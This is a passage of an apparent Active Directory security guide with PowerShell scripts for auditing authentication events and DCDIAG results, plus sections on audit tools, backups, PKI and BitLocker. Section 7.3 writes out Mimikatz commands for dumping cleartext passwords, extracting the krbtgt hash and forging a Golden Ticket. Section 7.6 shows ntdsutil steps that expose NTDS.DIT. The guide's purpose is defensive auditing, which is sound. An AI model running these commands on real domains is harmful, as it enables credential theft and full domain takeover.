        elseif ($Status -eq "0x2D") { $Status = "Failure - 0x2D - Service key not available" }
        elseif ($Status -eq "0x2E") { $Status = "Failure - 0x2E - Mutual authentication failed" }
        elseif ($Status -eq "0x2F") { $Status = "Failure - 0x2F - Incorrect message direction" }
        elseif ($Status -eq "0x30") { $Status = "Failure - 0x30 - Alternative authentication method required" }
        elseif ($Status -eq "0x31") { $Status = "Failure - 0x31 - Incorrect sequence number in message" }
        elseif ($Status -eq "0x32") { $Status = "Failure - 0x32 - Inappropriate type of checksum in message" }
        elseif ($Status -eq "0x3C") { $Status = "Failure - 0x3C - Generic error (description in e-text)" }
        elseif ($Status -eq "0x3D") { $Status = "Failure - 0x3D - Field is too long for this implementation" }
        else { $Status = "Failure - other error" }

        # Writing the common result file for all event IDs
        $TableResultat.Add("$DCEvent;$Status;$Date;$EventId;$TargetUserName;;$ServiceName;Kerberos;;;$IpAddress")

        # Writing the result file for event ID 4771
        $TableResultat4771.Add("$DCEvent;$Status;$Date;$EventId;$TargetUserName;$TargetSid;$ServiceName;$TicketOptions;$PreAuthType;$IpAddress;$IpPort;$CertIssuerName;$CertSerialNumber;$CertThumbprint")
    }
}

# Analysis of the 4648 events (simple LDAP bind)
elseif ($xml.Event.System.EventID -eq 4648) {
    $DCEvent = $xml.Event.System.Computer
    $Status = $xml.Event.System.Keywords
    if ($Status -eq "0x8020000000000000") { $Status = "Success Audit" }
    $Date = $xml.Event.System.TimeCreated.SystemTime
    $EventId = $xml.Event.System.EventID
    $SubjectUserSid = $xml.Event.EventData.Data[0].'#text'
    $SubjectUserName = $xml.Event.EventData.Data[1].'#text'
    $SubjectDomainName = $xml.Event.EventData.Data[2].'#text'
    $SubjectLogonId = $xml.Event.EventData.Data[3].'#text'
    $LogonGuid = $xml.Event.EventData.Data[4].'#text'
    $TargetUserName = $xml.Event.EventData.Data[5].'#text'
    $TargetDomainName = $xml.Event.EventData.Data[6].'#text'
    $TargetLogonGuid = $xml.Event.EventData.Data[7].'#text'
    $TargetServerName = $xml.Event.EventData.Data[8].'#text'
    $TargetInfo = $xml.Event.EventData.Data[9].'#text'
    $ProcessName = $xml.Event.EventData.Data[11].'#text'
    $IpAddress = $xml.Event.EventData.Data[12].'#text'
    $IpPort = $xml.Event.EventData.Data[13].'#text'

    # Exclude computer account authentication events
    if (!($TargetUserName.Contains('$'))) {

        # Writing the common result file for all event IDs
        $TableResultat.Add("$DCEvent;$Status;$Date;$EventId;$TargetUserName;$TargetDomainName;$TargetServerName;;Simple LDAP Bind or others;;$IpAddress")

        # Writing the result file for event ID 4648
        $TableResultat4648.Add("$DCEvent;$Status;$Date;$EventId;$SubjectUserSid;$SubjectUserName;$SubjectDomainName;$SubjectLogonId;$LogonGuid;$TargetUserName;$TargetDomainName;$TargetLogonGuid;$TargetServerName;$TargetInfo;$ProcessId;$ProcessName;$IpAddress;$IpPort")
    }
}

# Writing the common result file by blocks of lines
# Switching to a new file if it exceeds the maximum size
if ((($TableResultat.Count) % $EcritureNbLigne) -eq 0) {
    if ((Get-Item -Path $Resultat).Length -gt $MaxResultatSize) {
        $Resultat = $DossierTravail + $DC + "-AuditConnection_" + $Index + "-" + $DateReference.Year + "-" + $DateReference.Month + "-" + $DateReference.Day + "_" + $DateReference.Hour + "-" + $DateReference.Minute + "-" + $DateReference.Second + ".csv"
        $Index++
    }
    $TableResultat | Out-File $Resultat -Append
    Clear-Variable TableResultat
    $TableResultat = New-Object System.Collections.Generic.List[string]
}

# Writing the result file for event ID 4776 by blocks of lines
if ((($TableResultat4776.Count) % $EcritureNbLigne) -eq 0) {
    if ((Get-Item -Path $Resultat4776).Length -gt $MaxResultatSize) {
        $Resultat4776 = $DossierTravail + $DC + "-AuditConnection_ID4776_" + $Index4776 + "-" + $DateReference.Year + "-" + $DateReference.Month + "-" + $DateReference.Day + "_" + $DateReference.Hour + "-" + $DateReference.Minute + "-" + $DateReference.Second + ".csv"
        $Index4776++
    }
    $TableResultat4776 | Out-File $Resultat4776 -Append
    Clear-Variable TableResultat4776
    $TableResultat4776 = New-Object System.Collections.Generic.List[string]
}

# Writing the result file for event ID 4768 by blocks of lines
if ((($TableResultat4768.Count) % $EcritureNbLigne) -eq 0) {
    if ((Get-Item -Path $Resultat4768).Length -gt $MaxResultatSize) {
        $Resultat4768 = $DossierTravail + $DC + "-AuditConnection_ID4768_" + $Index4768 + "-" + $DateReference.Year + "-" + $DateReference.Month + "-" + $DateReference.Day + "_" + $DateReference.Hour + "-" + $DateReference.Minute + "-" + $DateReference.Second + ".csv"
        $Index4768++
    }
    $TableResultat4768 | Out-File $Resultat4768 -Append
    Clear-Variable TableResultat4768
    $TableResultat4768 = New-Object System.Collections.Generic.List[string]
}

# Writing the result file for event ID 4769 by blocks of lines
if ((($TableResultat4769.Count) % $EcritureNbLigne) -eq 0) {
    if ((Get-Item -Path $Resultat4769).Length -gt $MaxResultatSize) {
        $Resultat4769 = $DossierTravail + $DC + "-AuditConnection_ID4769_" + $Index4769 + "-" + $DateReference.Year + "-" + $DateReference.Month + "-" + $DateReference.Day + "_" + $DateReference.Hour + "-" + $DateReference.Minute + "-" + $DateReference.Second + ".csv"
        $Index4769++
    }
    $TableResultat4769 | Out-File $Resultat4769 -Append
    Clear-Variable TableResultat4769
    $TableResultat4769 = New-Object System.Collections.Generic.List[string]
}

# Writing the result file for event ID 4771 by blocks of lines
if ((($TableResultat4771.Count) % $EcritureNbLigne) -eq 0) {
    if ((Get-Item -Path $Resultat4771).Length -gt $MaxResultatSize) {
        $Resultat4771 = $DossierTravail + $DC + "-AuditConnection_ID4771_" + $Index4771 + "-" + $DateReference.Year + "-" + $DateReference.Month + "-" + $DateReference.Day + "_" + $DateReference.Hour + "-" + $DateReference.Minute + "-" + $DateReference.Second + ".csv"
        $Index4771++
    }
    $TableResultat4771 | Out-File $Resultat4771 -Append
    Clear-Variable TableResultat4771
    $TableResultat4771 = New-Object System.Collections.Generic.List[string]
}

# Writing the result file for event ID 4624 by blocks of lines
if ((($TableResultat4624.Count) % $EcritureNbLigne) -eq 0) {
    if ((Get-Item -Path $Resultat4624).Length -gt $MaxResultatSize) {
        $Resultat4624 = $DossierTravail + $DC + "-AuditConnection_ID4624_" + $Index4624 + "-" + $DateReference.Year + "-" + $DateReference.Month + "-" + $DateReference.Day + "_" + $DateReference.Hour + "-" + $DateReference.Minute + "-" + $DateReference.Second + ".csv"
        $Index4624++
    }
    $TableResultat4624 | Out-File $Resultat4624 -Append
    Clear-Variable TableResultat4624
    $TableResultat4624 = New-Object System.Collections.Generic.List[string]
}

# Writing the result file for event ID 4625 by blocks of lines
if ((($TableResultat4625.Count) % $EcritureNbLigne) -eq 0) {
    if ((Get-Item -Path $Resultat4625).Length -gt $MaxResultatSize) {
        $Resultat4625 = $DossierTravail + $DC + "-AuditConnection_ID4625_" + $Index4625 + "-" + $DateReference.Year + "-" + $DateReference.Month + "-" + $DateReference.Day + "_" + $DateReference.Hour + "-" + $DateReference.Minute + "-" + $DateReference.Second + ".csv"
        $Index4625++
    }
    $TableResultat4625 | Out-File $Resultat4625 -Append
    Clear-Variable TableResultat4625
    $TableResultat4625 = New-Object System.Collections.Generic.List[string]
}

# Writing the result file for event ID 4648 by blocks of lines
if ((($TableResultat4648.Count) % $EcritureNbLigne) -eq 0) {
    if ((Get-Item -Path $Resultat4648).Length -gt $MaxResultatSize) {
        $Resultat4648 = $DossierTravail + $DC + "-AuditConnection_ID4648_" + $Index4648 + "-" + $DateReference.Year + "-" + $DateReference.Month + "-" + $DateReference.Day + "_" + $DateReference.Hour + "-" + $DateReference.Minute + "-" + $DateReference.Second + ".csv"
        $Index4648++
    }
    $TableResultat4648 | Out-File $Resultat4648 -Append
    Clear-Variable TableResultat4648
    $TableResultat4648 = New-Object System.Collections.Generic.List[string]
}
}

# Writing the final result files
$TableResultat | Out-File $Resultat -Append
$TableResultat4776 | Out-File $Resultat4776 -Append
$TableResultat4768 | Out-File $Resultat4768 -Append
$TableResultat4769 | Out-File $Resultat4769 -Append
$TableResultat4771 | Out-File $Resultat4771 -Append
$TableResultat4624 | Out-File $Resultat4624 -Append
$TableResultat4625 | Out-File $Resultat4625 -Append
$TableResultat4648 | Out-File $Resultat4648 -Append

# Creation of the zip file
Write-Host "Creating zip file"
[Reflection.Assembly]::LoadWithPartialName("System.IO.Compression.FileSystem")
$CompressionLevel = [System.IO.Compression.CompressionLevel]::Optimal
[System.IO.Compression.ZipFile]::CreateFromDirectory($DossierTravail, $ResultatZip, $CompressionLevel, $false)

# Analysis of the file size
if ((Get-Item -Path $ResultatZip).Length -le $MaxResultatZipSize) {

    # Send an email with the attachment
    $Format = "<style>"
    $Format = $Format + "</style>"
    $Body = "<P>Hello</P>"
    $Body = $Body + "<P>Attached is the report on the users who authenticated on the domain controller $DC.</P>"
    $Body = $Body + "<P>Regards</P>"
    $Body = $Body + "<P>The Msreport IT team</P>"
    $Rapport = ConvertTo-Html -Title $Title -Body $Body -Head $Format
    Send-MailMessage -To $To -Subject "Audit of successful and failed authentication requests on $DC" -Body "$Rapport" -SmtpServer $SMTPServer -From $From -BodyAsHtml -Encoding ([System.Text.Encoding]::UTF8) -Attachments $ResultatZip
} else {

    # Send an email without the attachment, with a link to download the result file
    $Format = "<style>"
    $Format = $Format + "</style>"
    $Body = "<P>Hello</P>"
    $Body = $Body + "<P>Here is the link to the report on the users who authenticated on the domain controller $DC.</P>"
    $Body = $Body + "<P>$ResultatZipLink</P>"
    $Body = $Body + "<P>Regards</P>"
    $Body = $Body + "<P>The Msreport IT team</P>"
    $Rapport = ConvertTo-Html -Title $Title -Body $Body -Head $Format
    Send-MailMessage -To $To -Subject "Audit of successful and failed authentication requests on $DC" -Body "$Rapport" -SmtpServer $SMTPServer -From $From -BodyAsHtml -Encoding ([System.Text.Encoding]::UTF8)
}

# Deleting the working folder and the EVTX file
if ((Test-Path $DossierTravail) -eq $True) {
    Remove-Item $DossierTravail -Recurse -Force:$True
    Remove-Item $EventFile -Force
}
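The elseif chains above label each Kerberos result code one event at a time; the same mapping can be kept in a lookup table, and the per-event lines can then be aggregated into the signal a defender actually wants from the 4771 output: repeated bad-password pre-authentication failures (status 0x18) for one account from one address. The PowerShell below is an added example and is not part of the Msreport script. The event XML strings it reads are constructed for the example (the DC name, domain, SID and addresses are invented); the field indices are those of the 4771 event as used above.

```powershell
# Added example (not part of the Msreport script): lookup table for the Kerberos 4771 status codes
# and a summary of pre-authentication failures per account and source address.
# The sample events are constructed; names, SIDs and addresses are invented.

$KerberosStatus = @{
    '0x0'  = 'Success'
    '0x6'  = 'Client not found in Kerberos database'
    '0xC'  = 'KDC policy rejects request (could be workstation restrictions)'
    '0x12' = "Client's credentials have been revoked (account could be disabled, expired, locked)"
    '0x17' = 'Password has expired'
    '0x18' = 'Pre-authentication information was invalid (could be a bad password)'
    '0x25' = 'Clock skew too great'
}

# Read the fields of one 4771 event; the indices are those of the event's EventData, as in the script above
function ConvertFrom-Kerberos4771Event {
    param([Parameter(Mandatory)][xml]$EventXml)
    $data = $EventXml.Event.EventData.Data
    $code = $data[4].'#text'
    $text = if ($KerberosStatus.ContainsKey($code)) { $KerberosStatus[$code] } else { 'Other error' }
    [pscustomobject]@{
        DC             = $EventXml.Event.System.Computer
        Date           = $EventXml.Event.System.TimeCreated.SystemTime
        TargetUserName = $data[0].'#text'
        ServiceName    = $data[2].'#text'
        IpAddress      = $data[6].'#text' -replace '^::ffff:', ''   # 4771 logs IPv4 clients as ::ffff:a.b.c.d
        StatusCode     = $code
        Status         = $text
    }
}

# Accounts (computer accounts excluded, as in the script) with at least $Threshold
# bad-password pre-authentication failures coming from the same address
function Get-PreAuthFailureSummary {
    param([Parameter(Mandatory)][string[]]$EventXmlStrings, [int]$Threshold = 3)
    $events = foreach ($s in $EventXmlStrings) { ConvertFrom-Kerberos4771Event -EventXml ([xml]$s) }
    $events |
        Where-Object { $_.StatusCode -eq '0x18' -and -not $_.TargetUserName.Contains('$') } |
        Group-Object -Property TargetUserName, IpAddress |
        Where-Object { $_.Count -ge $Threshold } |
        ForEach-Object {
            [pscustomobject]@{
                Account   = $_.Group[0].TargetUserName
                IpAddress = $_.Group[0].IpAddress
                Failures  = $_.Count
                LastSeen  = ($_.Group | Sort-Object Date | Select-Object -Last 1).Date
            }
        }
}

# Constructed 4771 event in the XML layout the script above parses (all values assumed)
function New-Sample4771 {
    param([string]$User, [string]$Ip, [string]$Code, [string]$Time)
    @"
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4771</EventID><TimeCreated SystemTime="$Time" /><Computer>DC01.example.intra</Computer></System>
  <EventData>
    <Data Name="TargetUserName">$User</Data><Data Name="TargetSid">S-1-5-21-1-2-3-1104</Data>
    <Data Name="ServiceName">krbtgt/EXAMPLE</Data><Data Name="TicketOptions">0x40810010</Data>
    <Data Name="Status">$Code</Data><Data Name="PreAuthType">2</Data>
    <Data Name="IpAddress">::ffff:$Ip</Data><Data Name="IpPort">49152</Data>
    <Data Name="CertIssuerName"></Data><Data Name="CertSerialNumber"></Data><Data Name="CertThumbprint"></Data>
  </EventData>
</Event>
"@
}

$samples = @(
    New-Sample4771 -User 'jdoe'   -Ip '10.0.0.5'  -Code '0x18' -Time '2017-01-30T08:00:01Z'
    New-Sample4771 -User 'jdoe'   -Ip '10.0.0.5'  -Code '0x18' -Time '2017-01-30T08:00:02Z'
    New-Sample4771 -User 'jdoe'   -Ip '10.0.0.5'  -Code '0x18' -Time '2017-01-30T08:00:03Z'
    New-Sample4771 -User 'asmith' -Ip '10.0.0.9'  -Code '0x18' -Time '2017-01-30T08:01:00Z'
    New-Sample4771 -User 'WKS01$' -Ip '10.0.0.20' -Code '0x25' -Time '2017-01-30T08:02:00Z'
)
Get-PreAuthFailureSummary -EventXmlStrings $samples -Threshold 3 | Format-Table -AutoSize
```

With the constructed sample, only jdoe from 10.0.0.5 reaches the threshold; asmith has a single failure and the computer account is filtered out. On real data, feed the function the `<Event>` XML of each 4771 entry exactly as the script above obtains it, and tune the threshold to the lockout policy of the domain.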



7.3 AUDIT THE SECURITY OF YOUR DIRECTORY

There are many tools to assess the security level of your directory and to perform a security audit of the Active Directory (penetration testing).

• Mimikatz: this tool can display in clear text the passwords of all users logged on to a machine. It can also generate a Golden Ticket (Kerberos Pass-the-Ticket attack). The tool is free and is available online: http://blog.gentilkiwi.com/mimikatz

To display the login / password of all users logged on to a machine:

privilege::debug
sekurlsa::logonpasswords full

To generate a Golden Ticket:

Prerequisite 1: find the domain SID with the command whoami /user.

Prerequisite 2: find the NTHASH of the krbtgt account:

privilege::debug
sekurlsa::krbtgt

Then run the commands:

privilege::debug
kerberos::golden /admin:darkguigui /domain:msreport33.intra /id:4000 /sid:S-1-5-21-5951273541458299726-2062179204 /krbtgt:c4140df5b2ec6aaf0cb5d19b8cb4313b /startoffset:0 /endin:600 /renewmax:10080 /ptt

A video demonstration of the Golden Ticket generation procedure is available at:

https://experiences.microsoft.fr/Video/avec-laps-metsys-premunit-un-si-dattaques-par-elevationde-privileges/fd1a804d-c21d-4bbe-97d7-1697364fe5b5#EDHCo

• Kali (formerly BackTrack): this distribution bundles many tools (http://tools.kali.org/tools-listing) to perform penetration tests on domain controllers. It is free and can be downloaded at: https://www.kali.org/

• Metasploit: the reference tool. It includes many exploits that perform privilege escalations or crash a Windows machine. A basic version of the tool is free and can be downloaded at:

http://www.rapid7.com/products/metasploit/download.jsp

• BTA: this tool is provided by ANSSI. I invite you to read the following documents on BTA:
http://www.information-security.fr/audit-lactive-directory-bta/
https://www.sstic.org/media/SSTIC2014/SSTIC-actes/BTA_Analyse_de_la_securite_Active_Directory/SSTIC2014-Article-BTA_Analyse_de_la_securite_Active_Directory-czarny_biondi.pdf
https://www.sstic.org/2014/presentation/BTA_Analyse_de_la_securite_Active_Directory/

• ADRAP: this tool is provided by Microsoft. It is a comprehensive audit covering all the risks associated with Active Directory. ADRAP detects, for example, Active Directory configuration issues that could lead to an outage, as well as security risks.

7.4 SUPERVISE YOUR ACTIVE DIRECTORY

It is necessary to monitor Active Directory to identify potential outages generated by an attack. The solution below is based on a PowerShell script that analyzes the output of the command DCDIAG /V /E, which is run from a single server. The script must be installed on an English Windows Server 2008 R2 (or later) because the DCDIAG command must produce its output in English.

Note: the downloadable English version of DCDIAG works only on Windows 2003. It does not support, for example, SYSVOL folder replication with the DFS-R engine. For more information see http://www.microsoft.com/en-us/download/details.aspx?id=31063

Therefore you must install an English domain member server to monitor domain controllers installed with a French Windows.

7.4.1 PRESENTATION OF THE DCDIAG TOOL

DCDIAG is an Active Directory diagnostic tool that comprehensively checks the availability of the domain controllers, the proper functioning of replication, the availability of the FSMO roles, that the services are started, and so on.

The /V option enables verbose mode.

The /E option queries all domain controllers in the forest.

There are other options to perform DNS tests. For more information, type the command DCDIAG.EXE /?

7.4.2 DEPLOYING THE SOLUTION

7.4.2.1 Step 1: preparation of the server

Install an English Windows 2008 R2 / Windows 2012 member server. The script only works with the English DCDIAG. Launch Server Manager and click Add Features. Add the AD DS Snap-Ins and Command-Line Tools feature under Remote Server Administration Tools | AD DS and AD LDS Tools | AD DS Tools.

7.4.2.2 Step 2: allow execution of unsigned PowerShell scripts

Enter the following command to allow the execution of unsigned scripts (or, better, sign the code of the script): Set-ExecutionPolicy Unrestricted

7.4.2.3 Step 3: create the script c:\_adm\supervision\supervision.ps1

Copy the code available at this address: http://msreport.free.fr/articles/supervision.txt


# Objectives of the script
# Analyze the result of the command DCDIAG /V /E and produce four output files.
# The script must be run on an English version of Windows.

# Initialize the results to the default value
$Connectivity = "OK"
$Configuration = "OK"
$Sysvol = "OK"
$NTDS = "OK"

# Store the DCDIAG result in a variable
# In the example below the script queries the FR56DC2K12 domain controller. Change it!
$Dcdiagresu = dcdiag /v /e /s:FR56DC2K12

# Analyze the contents of the variable
# String.Contains is case-sensitive: the test names must match DCDIAG's capitalization exactly
foreach ($line in $Dcdiagresu) {

    # Test the availability of the directory
    if (($line.Contains("failed test Connectivity")) -or ($line.Contains("failed test Services"))) {
        $Connectivity = "KO"
    }

    # Test the Active Directory configuration
    if (($line.Contains("failed test KnowsOfRoleHolders")) -or ($line.Contains("failed test MachineAccount")) -or ($line.Contains("failed test Advertising")) -or ($line.Contains("failed test RidManager")) -or ($line.Contains("failed test LocatorCheck"))) {
        $Configuration = "KO"
    }

    # Test the Sysvol replication
    if (($line.Contains("failed test DFSREvent")) -or ($line.Contains("failed test SysVolCheck")) -or ($line.Contains("failed test KccEvent")) -or ($line.Contains("failed test NetLogons")) -or ($line.Contains("failed test NCSecDesc"))) {
        $Sysvol = "KO"
    }

    # Test the NTDS replication
    if (($line.Contains("failed test ObjectsReplicated")) -or ($line.Contains("failed test Replications")) -or ($line.Contains("failed test Intersite"))) {
        $NTDS = "KO"
    }
}

# Write the result files
$Connectivity | Out-File c:\Connectivity.txt -Force
$Configuration | Out-File c:\Configuration.txt -Force
$Sysvol | Out-File c:\Sysvol.txt -Force
$NTDS | Out-File c:\NTDS.txt -Force

7.4.2.4 Step 4: configure your monitoring application (such as Nagios)

Configure your monitoring application (such as Nagios) to read the 4 result files and raise an alert depending on the contents of each file: OK or KO.
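The supervision script reduces the whole DCDIAG output to four OK/KO flags, so the alert never says which domain controller or which test failed. As an added example (not part of the Msreport script), the PowerShell below parses the per-test result lines that the English DCDIAG /V /E prints ("......... <server> passed|failed test <name>") into objects, then derives the same four states while keeping the failing server and test name for the monitoring application. The DCDIAG output sample is constructed; the server names are invented.

```powershell
# Added example (not part of the Msreport supervision script): structured parsing of DCDIAG /V /E
# output and per-group OK/KO states that name the failing DC and test.
# The DCDIAG sample below is constructed; server names are invented.

# Same grouping of tests as the supervision script
$TestGroups = @{
    Connectivity  = @('Connectivity', 'Services')
    Configuration = @('KnowsOfRoleHolders', 'MachineAccount', 'Advertising', 'RidManager', 'LocatorCheck')
    Sysvol        = @('DFSREvent', 'SysVolCheck', 'KccEvent', 'NetLogons', 'NCSecDesc')
    NTDS          = @('ObjectsReplicated', 'Replications', 'Intersite')
}

# English DCDIAG prints one "......... <DC> passed|failed test <Test>" line per test and server
function ConvertFrom-DcdiagOutput {
    param([Parameter(Mandatory)][string[]]$Lines)
    $pattern = '^\s*\.+\s+(?<DC>\S+)\s+(?<Result>passed|failed)\s+test\s+(?<Test>\S+)\s*$'
    foreach ($line in $Lines) {
        if ($line -match $pattern) {
            [pscustomobject]@{ DC = $Matches.DC; Test = $Matches.Test; Passed = ($Matches.Result -eq 'passed') }
        }
    }
}

# For each group: "OK", or "KO: " followed by the DC/test pairs that failed
function Get-DcdiagGroupStatus {
    param([Parameter(Mandatory)][string[]]$Lines)
    $results = @(ConvertFrom-DcdiagOutput -Lines $Lines)
    $status = [ordered]@{}
    foreach ($group in 'Connectivity', 'Configuration', 'Sysvol', 'NTDS') {
        $failed = @($results | Where-Object { -not $_.Passed -and ($TestGroups[$group] -contains $_.Test) })
        if ($failed.Count -gt 0) {
            $status[$group] = 'KO: ' + (($failed | ForEach-Object { "$($_.DC)/$($_.Test)" }) -join ', ')
        } else {
            $status[$group] = 'OK'
        }
    }
    $status
}

# Constructed excerpt of DCDIAG /V /E output (server names invented)
$sample = @'
   Testing server: Default-First-Site-Name\FR56DC2K12
      Starting test: Connectivity
         ......................... FR56DC2K12 passed test Connectivity
      Starting test: Replications
         [Replications Check,FR56DC2K12] A recent replication attempt failed:
         ......................... FR56DC2K12 failed test Replications
      Starting test: SysVolCheck
         ......................... FR56DC2K12 passed test SysVolCheck
   Testing server: Default-First-Site-Name\FR56DC2K08
      Starting test: Advertising
         ......................... FR56DC2K08 failed test Advertising
'@ -split "`r?`n"

$status = Get-DcdiagGroupStatus -Lines $sample
$status

# One file per group, as the supervision script does, written under %TEMP% here instead of C:\
foreach ($group in $status.Keys) {
    $status[$group] | Out-File (Join-Path $env:TEMP "$group.txt") -Force
}
```

On the constructed sample, Connectivity and Sysvol are OK, NTDS is "KO: FR56DC2K12/Replications" and Configuration is "KO: FR56DC2K08/Advertising". To use it in place of the script, replace `$sample` with `dcdiag /v /e /s:<DC>` and keep the file names the monitoring application expects; the files still start with OK or KO, so the existing Nagios check keeps working and the alert text gains the failing server.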

7.5 HAVE AN IT RECOVERY PLAN (PRI) FOR ACTIVE DIRECTORY

If the security of your Active Directory is compromised, Microsoft recommends performing a restoration following the Forest Recovery scenario. This type of restoration has a strong impact on production because it requires stopping all existing domain controllers. Testing this procedure limits the downtime of the directory and therefore the impact on the business. Test the Forest Recovery procedure at least once every 6 months on a model environment that is a copy of the production environment. Microsoft's Forest Recovery procedure is available at this address (Appendix A):
http://technet.microsoft.com/fr-fr/library/planning-active-directory-forest-recovery(v=ws.10).aspx

7.6 PROTECT YOUR BACKUP AND ACTIVE DIRECTORY FILES MFIs (INSTALL FROM MEDIA)

Windows Server Backup is the backup tool integrated in Windows Server 2008 R1 and later. It can perform a full backup (Bare Metal image) of a domain controller and generates a VHD or VHDX file (depending on the Windows version). It makes it easy to restore a domain controller (from a Bare Metal backup) by booting from the Windows installation DVD and selecting the Repair your computer option. If an attacker manages to copy a backup of the directory, he will probably restore the domain controller, obtain the NTDS.DIT and SYSTEM files, and then apply the methodology above to obtain administrative access to the domain controller (cmd.exe copied and renamed sethc.exe). He will also try to recover the passwords of all user accounts and computer accounts from the LM hashes or NT hashes.

The Ntdsutil tool allows a domain administrator (and other privileged groups) to create an IFM media. This type of media allows you to install a new domain controller without replicating the contents of the directory over the network. It contains an offline copy of the NTDS.DIT file and of the SYSTEM hive (HKEY_LOCAL_MACHINE\SYSTEM in the registry). To generate an IFM, use the following procedure:

ntdsutil
activate instance ntds
ifm
create full C:\ifm

The Ntdsutil tool also allows a privileged user to create an Active Directory snapshot using the following procedure. Open a command prompt and type the following commands:

ntdsutil
snapshot
activate instance ntds
create

Msreport - Guillaume MATHIEU - All rights reserved


To mount the generated snapshot, type the following command:
mount {ID_snapshot}

The administrator can now copy and paste the NTDS.DIT and SYSTEM files, which are no longer protected by the system.

He can then unmount and delete the snapshot by typing the following commands:
list all
unmount {ID_SNAPSHOT}
delete {ID_SNAPSHOT}

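Since anyone who can read a backup, an IFM folder or a mounted snapshot can obtain NTDS.DIT and SYSTEM, the permissions on those locations deserve a regular check. The script below is an added example (not part of the Msreport guide) that lists NTFS ACEs granting read access to principals outside an allow-list. The paths (C:\ifm from the procedure above and the default Windows Server Backup folder C:\WindowsImageBackup) and the allow-list are sample values to adapt.

```powershell
# Added example (not part of the Msreport guide): report NTFS permissions on backup and IFM
# locations that grant read access to principals outside an allow-list.
# Assumptions: the paths and the allow-list below are sample values to adapt to your model.

function Get-BackupAclExposure {
    param(
        [string[]]$Paths = @('C:\ifm', 'C:\WindowsImageBackup'),   # sample locations
        [string[]]$AllowedPrincipals = @(                           # sample allow-list
            'NT AUTHORITY\SYSTEM',
            'BUILTIN\Administrators'
        )
    )
    # ReadData is the bit that lets a principal read file content (also set by Read,
    # ReadAndExecute, Modify and FullControl)
    $readMask = [System.Security.AccessControl.FileSystemRights]::ReadData
    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $acl = Get-Acl -LiteralPath $path
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # ACEs carrying only generic rights appear as raw numbers and are not expanded here
            if (($ace.FileSystemRights -band $readMask) -eq 0) { continue }
            if ($AllowedPrincipals -contains $ace.IdentityReference.Value) { continue }
            [pscustomobject]@{
                Path      = $path
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# An empty result means only the allow-listed principals can read the backup locations
Get-BackupAclExposure | Format-Table -AutoSize
```

Inherited ACEs are flagged too: a backup folder created under a path whose parent grants Users read access inherits that access, which is the usual way such files end up readable by every authenticated user.
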
8 NOTES
8.1 DEPLOYMENT PROCEDURE FOR MICROSOFT CERTIFICATION AUTHORITY

Launch Server Manager on a Windows 2012 R2 domain member machine with an account that is a member of the Enterprise Admins group and follow the procedure below.

The PKI deployed above has a basic configuration. Some additional configuration steps are required, such as publishing the AIA / CRL on a web site, configuring the maximum lifetime of a certificate (2 years by default), setting up the certificate templates (certificate deployment, lifetime), configuring certificate revocation (hourly CRL generation, CRL URL in the certificates), enabling role separation or implementing the archival of certificate private keys.

All these steps are explained in the following article: http://msreport.free.fr/?p=451
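As an added example (not taken from the guide or from the article above), the following script deploys the same Enterprise Root CA with PowerShell instead of Server Manager and applies three of the additional steps just listed that can be set from the command line: the maximum certificate lifetime, the CRL publication interval and role separation. The CA name, key size and periods are sample values; AIA / CRL web publishing, templates and key archival are not covered.

```powershell
# Added example (not part of the Msreport guide): deploy an Enterprise Root CA with PowerShell
# and apply some of the hardening steps listed above.
# Assumptions: run on a Windows 2012 R2 domain member as an Enterprise Admin; the CA common
# name, key length and periods are sample values to adapt.

# 1. Install the AD CS role and its management tools
Install-WindowsFeature ADCS-Cert-Authority -IncludeManagementTools

# 2. Configure an Enterprise Root CA with a 4096-bit RSA key, SHA-256 and a 10-year CA certificate
Install-AdcsCertificationAuthority -CAType EnterpriseRootCA `
    -CACommonName 'CORP-ROOT-CA' `
    -CryptoProviderName 'RSA#Microsoft Software Key Storage Provider' `
    -KeyLength 4096 -HashAlgorithmName SHA256 `
    -ValidityPeriod Years -ValidityPeriodUnits 10 `
    -Force

# 3. Cap the lifetime of issued certificates at 2 years: the CA applies this limit whatever
#    the template requests
certutil -setreg CA\ValidityPeriodUnits 2
certutil -setreg CA\ValidityPeriod "Years"

# 4. Publish a new base CRL every hour (the interval mentioned above); delta CRLs follow the
#    same pattern with CRLDeltaPeriodUnits / CRLDeltaPeriod
certutil -setreg CA\CRLPeriodUnits 1
certutil -setreg CA\CRLPeriod "Hours"

# 5. Enable role separation. Assign the CA Administrator and Certificate Manager roles to
#    distinct accounts first: once enabled, an account holding both roles is denied both.
certutil -setreg CA\RoleSeparationEnabled 1

# 6. Restart the service so the registry changes take effect, then read them back
Restart-Service certsvc
certutil -getreg CA\ValidityPeriodUnits
certutil -getreg CA\CRLPeriodUnits
certutil -getreg CA\RoleSeparationEnabled
```

The certutil -getreg calls at the end are the verification step: every registry change made with certutil -setreg is only effective after the Certificate Services service restarts, so reading the values back after the restart confirms what the running CA enforces.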

8.2 PROCEDURE FOR ENABLING BITLOCKER ON A DOMAIN CONTROLLER

8.2.1 PRESENTATION OF THE SOLUTION FOR ENCRYPTING THE HARD DRIVE OF DOMAIN CONTROLLERS

BitLocker allows you to encrypt the system drive, a fixed (non-system) disk or a removable disk (USB key, etc.). BitLocker is included as a feature in Windows 2008 R2 and later.

BitLocker automatically creates two partitions: a 100 MB partition, marked active, that contains the boot files, and the system partition that contains the system data (C:\Windows). Only the system partition is encrypted. BitLocker can use different devices to store the encryption / decryption key:

• A USB key (startup key only): this method only encrypts the drive. It provides no validation of the components of the boot sequence and no guarantee against hardware tampering. To use this method, your computer must support reading USB devices in the pre-boot environment.

• A smart card: BitLocker then relies on the certificate of the smart card to encrypt / decrypt the hard drive.

• A TPM (Trusted Platform Module): this is the method recommended by Microsoft. It protects the hard drive and validates that the components of the boot sequence have not been altered.

8.2.2 IMPLEMENTATION OF BITLOCKER ON WINDOWS 2012 R2 DOMAIN CONTROLLERS

All the information below is taken from the following Microsoft documents:

http://technet.microsoft.com/fr-fr/library/dd875547(v=ws.10).aspx
http://technet.microsoft.com/en-us/library/jj679890.aspx
http://technet.microsoft.com/en-us/library/hh831412.aspx

The first step is to install the BitLocker feature on a domain controller (physical or virtual machine). A restart is required. For more information: http://technet.microsoft.com/fr-fr/library/jj612864.aspx

